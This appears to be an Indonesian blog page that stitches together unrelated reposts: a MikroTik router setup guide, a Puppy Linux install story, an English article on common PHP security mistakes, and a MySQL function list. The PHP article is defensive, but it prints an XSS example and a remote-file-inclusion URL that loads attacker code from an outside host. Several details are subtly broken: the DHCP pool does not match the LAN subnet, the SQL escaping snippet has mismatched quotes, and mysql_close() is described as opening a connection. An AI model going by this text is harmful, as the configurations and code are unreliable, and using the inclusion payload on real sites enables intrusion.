Lab komputer / bengkelnya adi

sumber http://diqie.wordpress.com/2007/08/06/seting-roter-mikrotik/

SKENARIO

LAN —> Mikrotik RouterOS —> Modem ADSL —> INTERNET

Untuk LAN, kita menggunakan ip address class C, dengan network 192.168.10.0/24. Untuk Mikrotik RouterOS, kita perlu dua ethernet card. Satu (ether1 – 192.168.1.2/24) untuk sambungan ke Modem ADSL dan satu lagi (ether2 – 192.168.10.1/24) untuk sambungan ke LAN. Untuk Modem ADSL, IP kita set 192.168.1.1/24.

Sebelum mengetikkan apapun, pastikan Anda telah berada pada root menu dengan mengetikkan “/”

1. Set IP untuk masing² ethernet card

ip address add address=192.168.1.2/24 interface=ether1 (public)

ip address add address=192.168.10.1/24 interface=ether2 (local)

Untuk menampilkan hasil perintah di atas ketikkan perintah berikut:

ip address print

Kemudian lakukan testing dengan mencoba nge-ping ke gateway atau ke komputer yg ada pada LAN. Jika hasilnya sukses, maka konfigurasi IP Anda sudah benar

ping 192.168.1.1
ping 192.168.10.10

2. Menambahkan Routing
ip route add gateway=192.168.1.1

3. Setting DNS

ip dns set primary-dns=202.134.1.10 allow-remote-requests=yes
ip dns set secondary-dns=202.134.0.155 allow-remote-requests=yes

Karena koneksi ini menggunakan Speedy dari Telkom, maka DNS yg aq pake ya punya Telkom. Silahkan sesuaikan dengan DNS provider Anda.

Setelah itu coba Anda lakukan ping ke yahoo.com misalnya:

ping yahoo.com

Jika hasilnya sukses, maka settingan DNS sudah benar

4. Source NAT (Network Address Translation) / Masquerading

Agar semua komputer yg ada di LAN bisa terhubung ke internet juga, maka Anda perlu menambahkan NAT (Masquerade) pada Mikrotik.

ip firewall nat add chain=srcnat action=masquerade out-interface=ether1

Sekarang coba lakukan ping ke yahoo.com dari komputer yang ada di LAN

ping yahoo.com

Jika hasilnya sukses, maka setting masquerade sudah benar

5. DHCP (Dynamic Host Configuration Protocol)

Karena alasan supaya praktis, temenku pengin pake DHCP Server. Biar klo tiap ada klien yang konek, dia ga perlu setting IP secara manual. Tinggal obtain aja dari DHCP Server, beres dah. Untungnya Mikrotik ini juga ada fitur DHCP Servernya. Jadi ya ga ada masalah..
* Membuat IP Address Pool

ip pool add name=dhcp-pool ranges=192.168.0.2-192.168.0.254

* Menambahkan DHCP Network
ip dhcp-server network add address=192.168.10.0/24 gateway=192.168.10.1 dns-server=202.134.1.10,202.134.0.155

* Menambahkan Server DHCP

ip dhcp-server add name=DHCP_LAN disabled=no interface=ether2 address-pool=dhcp-pool
Sekarang coba lakukan testing dari komputer klien, untuk me-request IP Address dari Server DHCP. Jika sukses, maka sekali lagi, settingannya udah bener

6. Management Bandwidth

Agar semua komputer klien pada LAN tidak saling berebut bandwidth, maka perlu dilakukan yg namanya bandwidth management atau bandwidth control, idea: (saya menggunakan simple que supaya lebih mudah ;

queue simple add name=”Billing” target-address=192.168.10.2/32 dst-address=0.0.0.0/0 interface=Local queue=default priority=8 limit-at=16000/32000 max-limit=16000/64000

queue simple add name=”Kasir” target-addresses=192.168.10.3/32 dst-address=0.0.0.0/0 interface=Local parent=Shaping priority=8 queue=default/default limit-at=0/8000 max-limit=0/256000 total-queue=default

Lanjutkan perintah tersebut untuk semua client yang ingin di limit bnadwithnya.

7. Graphing

Mikrotik ini juga dilengkapi dengan fungsi monitoring traffic layaknya MRTG biasa. Jadi kita bisa melihat berapa banyak paket yg dilewatkan pada PC Mikrotik kita.

tool graphing set store-every=5min

Berikutnya yang akan kita monitor adalah paket² yg lewat semua interface yg ada di PC Mikrotik kita, klo di komputerku ada ether1 dan ether2.

tool graphing interface add interface=all store-on-disk=yes

Sekarang coba arahkan browser anda ke IP Router Mikrotik. Klo aq di sini:

http://192.168.10.1/graphs/

Nanti akan ada pilihan interface apa aja yg ada di router Anda. Coba klik salah satu, maka Anda akan bisa melihat grafik dari paket2 yg lewat pada interface tersebut.

Cara paling cepat pasang Puppy Linux adalah dengan meng-copy file isi Install CD ke sebuah direktori, dan pasang grub loader versi DOS untuk boot dari direktori itu. Tanpa perlu partisi khusus.

Saya ingin memasang Linux di netbook kantor saya, Lenovo S10.Saya sudah sangat bosan dengan urusan virus di Windows.

Netbook ini memiliki Windows XP home edition, pre-installed. Tapi ia tidak punya CD ROM drive. Kita bisa pasang Puppy menggunakan USB flash drive. Tapi biasanya ini butuh flash kosong, dan butuh kemampuan boot dari USB. Saya kurang suka, karena tidak semua bios bisa mendukung boot USB, dan juga saya tidak sempat cari flash disk kosong.

Yang saya lakukan sebagai berikut.

1. Dari Windows, download Virtual CD dari Microsoft. Ini program kecil yang bisa membaca iso file dan me-mount nya menjadi CDROM virtual.
2. Download Puppy Install CD iso file. Attach dan mount file ini menggunakan virtual CD, menjadi puppy install cdrom. Saya mendownload Puppy versi 4.21.
3. Download grub4dos. Kita perlu file gldr untuk diletakkan di root C:\.
4. Buat direktory puppy421 di C:\ kemudian buat sebuah file dummy idehd di situ. (Puppy linux butuh file ini untuk boot).
5. Copy isi puppy cdrom ke direktori c:\puppy421. Jangan lupa ubah semua filename ke lowercase, karena CDROm cenderung membuat nama dengan uppercase, sedangkan linux itu case sensitive. Anda sebetulnya hanya butuh file vmlinuz, initgrd, dan pup_421.sfs. Tapi tidak-apa apa karena file lain berukuran kecil sekali.
6. Buat file menu.lst di c:\ untuk dibaca oleh grubloader. Isi disitu informasi boot puppy dari direktory c:\puppy421.
7. Modifikasi file c:\boot.ini untuk menambah perintah c:\gldr
8. Windows di restart, dan voila,  kita bisa punya pilihan boot windows atau Puppy saat komputer diboot.

Sekarang Netbook kantor sudah jalan Puppy Linux 4.21. Xorg langsung menemukan resolusi aneh S10 1024×576. Tanpa partisi baru. Tanpa CDROM. Tanpa boot USB. Nice….

Oh ya, Netbook Lenovo S110 ini menggunakan Broadcom wireless LAN BCM4312 USB. Puppy 4.21 kelihatannya tidak support. Tapi saya bisa menggunakan ndiswrapper. Jadi sekarang wifi nya sudah jalan juga.

sumber : http://azrl.wordpress.com/2009/06/13/cara-cepat-install-puppy-linux/

1.
Not escaping entities

It’s basic knowledge; ALL untrusted input
(especially user input from forms) has to be sanitized before it is
being output.

echo
$_GET[’username’];

Can for instance output:

<script>/*snooping cookie or changing admin password
script*/</script>

It is an apparent security risk not to sanitize
untrusted data before output. Besides you might end up with pages
looking very messy if you do not thread user input the right
way.

How to fix it:

Basically you need to convert < , >, ‘ and " to their proper
entities (&lt; , &gt; &#039; , and
&quot . The functions htmlspecialchars and htmlentities() do
the work.

So here is the right
way:

echo
htmlspecialchars($_GET[’username’],
ENT_QUOTES);

Uncountable scripts carries this
problem.

2.
Not Escaping SQL input

When querying your database all ways make sure
untrusted data gets escaped else your application will be
vulnerable to SQL-injections and
unreliable, some coders think that they have covered their asses by
having magic_quotes on in their php.ini. The problem is that
untrusted input can come from other sources than $_GET, $_POST and
$_COOKIE (crawling other websites or using input from the
database). And what happens if magic_quotes suddenly is set to
OFF?

How to fix it:

I recommend setting magic_quotes to off in php.ini
or by using .htaccess and then using mysql_real_escape_string() on
all variables used in SQL-expressions.

<?php

$sql = "UPDATE
users SET

name=’.mysql_real_escape_string($name).’

WHERE
id=’.mysql_real_escape_string ($id).’";

mysql_query($sql);

?>

In PHP5 combined with mysql5 you can also use
bindings.

If you leave magic_quotes On you will just
have to trust your instinct.

3.
Wrong use of HTTP-header related functions: header(),
session_start(), setcookie()

Have you ever encountered this
warning? "warning: Cannot add header information -
headers already sent [….]

Most likely you have either during development or when deploying
PHP applications. When your browser downloads a web page the data
response from the server is structured in two different parts: The
header part and the content part.

The header consist of not visible data such as
cookies to be set or if the browser should redirect to another
location. The header always comes
first.

The content part consists of the visible content HTML, image data
and so on.

If output_buffering is
set to Off in php.ini your. When the script outputs during
execution all header related functions (setcookie(), header(),
session_start()) must be called before any output. The problem is
when somebody develops on one platform configuration and deploys to
another platform configuration, then redirects stops working,
cookies and sessions are not being
stored…

How to fix
it:

The right way is actually very
simple make your script call all header related functions before
you start any output and set output_buffering = Off
in php.ini (at your development
platform). If this is a problem on existing scripts you can all
ways hack about with the output control
functions.

4.
Requiring and including files using untrusted
data

Again and again
do not trust data you do not
declare implicitly: Including and requiring files from but not
limited to $_GET, $_POST and $_COOKIE is a stupid and mortal path,
you want to control which exacts code your server
executes.

Example:

index.php

<?

//including
header, config, database connection, etc

include($_GET[’filename’]);

//including
footer

?>

Any hacker can now request following
URL:http://www.yourdomain.com/index.php?filename=anyfile.txt

By doing so the hacker can extract confidential
information and execute PHP scripts stored on the server. Now if
allow_url_fopen is set to On in your PHP.ini you
will be doomed:

Try this one out:

http://www.yourdomain.com/index.php?filename=http%3A%2F%2Fdomain.com%2Fphphack.php

Then your script include and parse any code which the web page
on http://www.youaredoomed.com/phphack.php
outputs. Doing so he can for
instance send spam mails, change passwords, delete files…. I have
a very limited imagination.

How to fix it: You have to control which files the script is allowed to include
and which it is not allowed to include.

Note: This is only a quick fix:

<?

//Include only
files that are allowed.

$allowedFiles =
array(’file1.txt’,'file2.txt’,'file3.txt’);

if(in_array((string)$_GET[’filename’],$allowedFiles))
{

include($_GET[’filename’]);

}

else{

exit(’not
allowed’);

}

?>

5. Syntax
errors

This covers all the parse and syntax errors YOU make during
development, these are probably uncountable, right? Usually it is a
bracket, semi-colon, quotation mark or parenthesis that is missing
or placed wrong it is a time eater and that is why I have put it on
the list. There is only one way to fight it: Become aware of which
syntax errors you make and find ways to avoid repeating them! Of
course a good text editor will help you a lot here please, do not
use notepad.

6. No or little use of Object
Orientation

Too many systems I have seen and been working with have this
problem. They simply do not have any object orientation. Yes object
and classes for a beginner are abstract but if for instance you
build a shop system and you are not being object orientated, then
the source code will become unmaintainable with time and size. PHP
has been supporting basic object orientation since PHP4 and since
PHP5 a lot more and a lot better, so get your ass on to using
it.

7. Not using a framework

95% of all development with PHP is about developing the same four
things: Create, edit, list and delete. To do all this in pure PHP
without using a PHP MVC
Framework of some kind (let it be home made or open source) is
just plain stupid and a waste of YOUR
time (of course there are exceptions and you can
have good explanation on why you don’t use a
framework).

I talk out of experience and
there is so much PHP out there but so little use of frameworks. Get
your fingers dirty now.

8. Not knowing about existing
functionality

One of the strong things about PHP is that
there’s so much functionality available in the PHP core but also in
the pure PHP extensions. However time again and again scripts
people are inventing the deep plate. I am guilty in doing this, but
it is waste of time where you should be saving your time. Even when
PHP functionality is out of question you can in a lot of situations
save yourself time by using exec() to execute from
shell.

Save yourself time searching the manual
on www.php.net
and Google, keep yourself updated on new
features in future releases and by ask the right people when
needed.

9. Using old PHP
versions

This
problem primarily relates to people developing on PHP4 to put it
short you are developing on a deprecating platform and not using
the full potential of your knowledge move on, there’s a lot of good
stuff and functionality in PHP5. And it is really not a big deal to
change to PHP5 most applications only need a few moderations or no
moderations to cope with the change.

Secondary there is the security risk of running on old and
unpatched software it might end up damaging your
applications.

According to Damien Seguy (founder of the French PHP portal
http://www.nexen.net) 12% of all
PHP servers where running PHP5 by the start of November 2006.

Read the article here (French).

So if you are developing PHP you are most likely (88%) still doing
it on PHP4, shame on you!

10. Double escaping
quotes

Have you ever seen a web page
display a text with ‘ or " , it
usually happens when a script is made for magic_quotes
of (php.ini) and is deployed
on a site with magic_quotes on. First PHP runs addslashes() on all GET,
POST and COOKIE data then afterwards one more time when the data is
being stored.

mysql_close() }
Digunakan untuk koneksi dengan server MySQL

mysql_affected_rows()
Get number of affected rows in previous MySQL operation

mysql_connect()
Untuk membuka koneksi dengan database MySQL Server

mysql_create_db()
Untuk membuat database baru, perintah ini dapat menggunakan perintah CREATE DATABASE

mysql_data_seek()
Move internal result pointer

mysql_db_name()
Untuk menghasilkan nama database

mysql_db_query()
Untuk mengantarkan query SQL

mysql_drop_db()
Untuk menghapus database, perintah sa,a fungsinya dengan perintah DROP DATABASE

mysql_errno()
Untuk menampilkan pesan kesalahan dalam bentuk no dari server MySQL

mysql_error()
Untuk menampilkan pesan kesalahan dalam bentuk teks dari server MySQL

mysql_fecth_array()
Menghasilkan
data array dari isi tabel yang diseleksi (ditampilkan), untuk
mengaksesnya dapat mnegunakan indeks berupa nama kolom dari tabel

mysql_fecth_assoc()
Menghasilkan data berupa array dalam bentuk field dari tabel MySQL

mysql_fecth_field()
Menghasilkan informasi kolom dari hasil yang kemudian dikembalikan sebagai suatu objek

mysql_fecth_lengths()
Menghasilkan besar file dari hasil tabel MySQL

mysql_fecth_object()
Menghasilkan sebuah baris sebagai suatu objek

mysql_fecth_row()
Menghasilkan
data array dari isi tabel yang diseleksi (ditampilkan), untuk
mengaksesnya dapat menggunakan indeks angka (0,1,2,3,…)

mysql_field_name()
Menghasilkan nama field khusu pada database MySQL

mysql_field_len()
Untuk mendapatkan panjang kolom

mysql_field_seek()
Set result pointer to a specified field offset

mysql_field_table()
Get name of the table the specified field is in

mysql_field_type()
Get the type of the specified field in a result

mysql_free_result()
Free result memory

mysql_insert_id()
Get the id generated from the the previous INSERT operation

mysql_list_dbs()
Untuk mendapatkan daftar semua database yang ada pada server MySQL

mysql_list_fields()
Untuk mendapatkan daftar semua kolom pada tabel yang aktif

mysql_list_tables()
Untuk mendapatkan daftar semua tabel pada database yang aktif

mysql_num_fields()
Mendapatkan jumlah kolom pada hasil perintah

mysql_num_rows()
Digunakan untuk mendapatkan jumlah hasil dari perintah yang dijalankan, biasanya dari perintah SELECT yang dijalankan

mysql_pconnect()
Membuka koneksi langsung dengan MySQL

mysql_query()
Digunakan untuk mengirimkan atau menjalankan perintah SQL

mysql_result()
Untuk menghasilkan data

mysql_select_db()
Digunakan untuk masuk atau mengaktifkan database di dalam server MySQL

mysql_tablename()
Mendapatkan nama tabel